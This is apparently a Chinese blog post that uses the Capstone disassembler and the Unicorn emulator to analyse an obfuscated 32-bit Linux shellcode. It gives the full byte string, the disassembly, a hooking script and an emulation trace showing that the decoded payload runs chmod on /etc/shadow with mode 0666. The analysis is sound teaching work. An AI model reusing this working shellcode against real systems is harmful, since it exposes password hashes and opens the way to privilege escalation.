  • 练习使用Unicorn、Capstone

    Unicorn是一个轻量级的多平台,多体系结构的CPU仿真器框架。官网:http://www.unicorn-engine.org/

    Capstone是一个轻量级的多平台,多体系结构的反汇编框架。官网:http://www.capstone-engine.org/

    参考:https://bbs.pediy.com/thread-224330.htm

    练习:分析混淆的shellcode

    shellcode=b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"

    使用capstone反汇编:

    from capstone import*
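    md = Cs(CS_ARCH_X86, CS_MODE_32)  # disassembler for 32-bit x86

    # The sample under analysis. Each byte is a \x escape (the blog's
    # rendering dropped the backslashes, which turned the literal into
    # ~350 ASCII characters instead of 116 bytes; restored here).
    shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"

    # Linear-sweep disassembly starting at address 0. This is a first
    # look only: the `call 4` at offset 0 jumps into the last byte of the
    # call itself, so the static listing is wrong from 0x5 on, and the
    # bytes from 0x4e onward are rewritten by the decoder loop before
    # they ever execute. Use the emulation run below for the real flow.
    for insn in md.disasm(shellcode, 0x0):
        print("0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))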

    反汇编结果:

    0x0:    call    4
    0x5:    rcr    byte ptr [ebp + 0x6a], 5
    0x9:    pop    ebx
    0xa:    sub    ebp, ebx
    0xc:    add    ebp, 0x4e
    0xf:    mov    ecx, ebp
    0x11:    push    2
    0x13:    add    ecx, dword ptr [esp]
    0x16:    pop    ebx
    0x17:    xor    edx, edx
    0x19:    mov    dx, 0x12
    0x1d:    mov    edi, dword ptr [ecx]
    0x1f:    shl    edi, 0x10
    0x22:    shr    edi, 0x10
    0x25:    sub    ecx, 0xfffffffe
    0x2b:    mov    eax, dword ptr [ebp]
    0x2e:    shl    eax, 0x10
    0x31:    shr    eax, 0x10
    0x34:    mov    ebx, eax
    0x36:    or    ebx, edi
    0x38:    and    eax, edi
    0x3a:    not    eax
    0x3c:    and    eax, ebx
    0x3e:    mov    word ptr [ebp], ax
    0x42:    add    ebp, 2
    0x45:    dec    edx
    0x46:    test    edx, edx
    0x48:    jne    0x1d
    0x4e:    in    al, dx
    0x4f:    aaa    
    0x50:    jne    0xaf
    0x52:    jp    0x59
    0x54:    sub    ch, ch
    0x56:    and    al, 0xed
    0x58:    and    al, 0xed
    0x5a:    or    ecx, dword ptr [eax - 0x67af1481]
    0x60:    cmp    cl, bh
    0x62:    pop    esp
    0x63:    xchg    eax, esi
    0x64:    sub    edx, dword ptr [esi - 0x390190]

    静态反汇编从 0x5 起就已失真:`call 4` 的目标落在这条 5 字节 call 指令的最后一个字节上(0x4 处的 `ff c0` 实际是 `inc eax`),线性反汇编得到的 `rcr` 等指令并不会被执行;同时 0x4e 之后的字节是待解码的数据,要等循环改写后才成为真正的代码。下面使用unicorn模拟执行

    from unicorn import *
    from unicorn.x86_const import *
    from capstone import*
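    md = Cs(CS_ARCH_X86, CS_MODE_32)  # disassembler used by the trace hook

    BASE = 0x400000          # guest address the shellcode is mapped at
    STACK_ADDR = 0x0         # guest address of the stack region
    STACK_SIZE = 1024 * 1024 # 1 MiB stack

    mu = Uc(UC_ARCH_X86, UC_MODE_32)  # 32-bit x86 emulator instance

    # Only these two regions exist in the guest; any access outside them
    # is an emulation error rather than a read of the host's memory.
    mu.mem_map(BASE, 1024 * 1024)       # 1 MiB code region for the sample
    mu.mem_map(STACK_ADDR, STACK_SIZE)  # stack region

    # Same bytes as the static pass; each byte is a \x escape (the blog's
    # rendering dropped the backslashes, restored here).
    shellcode = b"\xe8\xff\xff\xff\xff\xc0\x5d\x6a\x05\x5b\x29\xdd\x83\xc5\x4e\x89\xe9\x6a\x02\x03\x0c\x24\x5b\x31\xd2\x66\xba\x12\x00\x8b\x39\xc1\xe7\x10\xc1\xef\x10\x81\xe9\xfe\xff\xff\xff\x8b\x45\x00\xc1\xe0\x10\xc1\xe8\x10\x89\xc3\x09\xfb\x21\xf8\xf7\xd0\x21\xd8\x66\x89\x45\x00\x83\xc5\x02\x4a\x85\xd2\x0f\x85\xcf\xff\xff\xff\xec\x37\x75\x5d\x7a\x05\x28\xed\x24\xed\x24\xed\x0b\x88\x7f\xeb\x50\x98\x38\xf9\x5c\x96\x2b\x96\x70\xfe\xc6\xff\xc6\xff\x9f\x32\x1f\x58\x1e\x00\xd3\x80"
    mu.mem_write(BASE, shellcode)  # load the code to be emulated
    # ESP in the middle of the stack region so both pushes and pops have room.
    mu.reg_write(UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE // 2)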
    
    
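    def syscall_num_to_name(num):
        """Map an `int 0x80` syscall number (taken from EAX) to a name.

        Only the two calls this sample makes are known. Any other number
        yields "unknown_syscall_<num>" instead of raising KeyError, so the
        hook keeps tracing and the unexpected call still shows up in the log.

        Args:
            num: syscall number as an int.

        Returns:
            The syscall name as a str.
        """
        syscalls = {1: "sys_exit", 15: "sys_chmod"}
        return syscalls.get(num, "unknown_syscall_%d" % num)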
    
    
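    def hook_code(mu, address, size, user_data):
        """Per-instruction hook: print the disassembly and intercept `int 0x80`.

        Registered with UC_HOOK_CODE, so Unicorn calls it before each
        instruction executes. When the instruction is `int 0x80` (CD 80),
        the syscall number in EAX and the arguments in EBX/ECX are read
        and printed, and EIP is moved past the instruction so the syscall
        is only observed, never carried out. On sys_exit the emulation is
        stopped via the emulator rather than by exiting the interpreter.

        Args:
            mu: the Uc instance running the code.
            address: guest address of the instruction about to execute.
            size: length of that instruction in bytes.
            user_data: opaque value from hook_add; unused here.
        """
        # print('>>> Tracing instruction at 0x%x, instruction size = 0x%x' % (address, size))

        machine_code = mu.mem_read(address, size)
        for insn in md.disasm(machine_code, address):
            print("     0x%x:\t%s\t%s" % (insn.address, insn.mnemonic, insn.op_str))

        # Everything below applies only to `int 0x80`. The comparison needs
        # real bytes; the garbled b"xcdx80" from the original post never
        # matched a two-byte instruction.
        if machine_code != b"\xcd\x80":
            return

        r_eax = mu.reg_read(UC_X86_REG_EAX)
        r_ebx = mu.reg_read(UC_X86_REG_EBX)
        r_ecx = mu.reg_read(UC_X86_REG_ECX)
        syscall_name = syscall_num_to_name(r_eax)
        print("--------------")
        print("We intercepted system call: " + syscall_name)

        if syscall_name == "sys_chmod":
            # EBX points at the path string; read a bounded window and cut at NUL.
            path = mu.mem_read(r_ebx, 20).split(b"\x00")[0]
            print("arg0 = 0x%x -> %s" % (r_ebx, path))
            print("arg1 = " + oct(r_ecx))
        elif syscall_name == "sys_exit":
            print("arg0 = " + hex(r_ebx))
            # Ask the emulator to stop instead of calling exit() from inside
            # a native callback; emu_start() then returns normally.
            mu.emu_stop()

        # Advance EIP over the `int 0x80` so the guest resumes at the next instruction.
        mu.reg_write(UC_X86_REG_EIP, address + size)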
    
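    # hook_code runs before every instruction (UC_HOOK_CODE).
    mu.hook_add(UC_HOOK_CODE, hook_code)
    # Start at BASE with an end address just below it that the guest never
    # reaches, so the run ends only when the hook stops it or on an
    # emulation error (e.g. an access outside the two mapped regions).
    mu.emu_start(BASE, BASE - 1)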

    执行结果:

         0x400000:    call    0x400004
         0x400004:    inc    eax
         0x400006:    pop    ebp
         0x400007:    push    5
         0x400009:    pop    ebx
         0x40000a:    sub    ebp, ebx
         0x40000c:    add    ebp, 0x4e
         0x40000f:    mov    ecx, ebp
         0x400011:    push    2
         0x400013:    add    ecx, dword ptr [esp]
         0x400016:    pop    ebx
         0x400017:    xor    edx, edx
         0x400019:    mov    dx, 0x12
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40001d:    mov    edi, dword ptr [ecx]
         0x40001f:    shl    edi, 0x10
         0x400022:    shr    edi, 0x10
         0x400025:    sub    ecx, 0xfffffffe
         0x40002b:    mov    eax, dword ptr [ebp]
         0x40002e:    shl    eax, 0x10
         0x400031:    shr    eax, 0x10
         0x400034:    mov    ebx, eax
         0x400036:    or    ebx, edi
         0x400038:    and    eax, edi
         0x40003a:    not    eax
         0x40003c:    and    eax, ebx
         0x40003e:    mov    word ptr [ebp], ax
         0x400042:    add    ebp, 2
         0x400045:    dec    edx
         0x400046:    test    edx, edx
         0x400048:    jne    0x40001d
         0x40004e:    cdq    
         0x40004f:    push    0xf
         0x400051:    pop    eax
         0x400052:    push    edx
         0x400053:    call    0x400064
         0x400064:    pop    ebx
         0x400065:    push    0x1b6
         0x40006a:    pop    ecx
         0x40006b:    int    0x80
    --------------
    We intercepted system call: sys_chmod
    arg0 = 0x400058 -> bytearray(b'/etc/shadow')
    arg1 = 0o666
         0x40006d:    push    1
         0x40006f:    pop    eax
         0x400070:    int    0x80
    --------------
    We intercepted system call: sys_exit
    arg0 = 0x400058
  • 原文地址:https://www.cnblogs.com/DirWang/p/12297192.html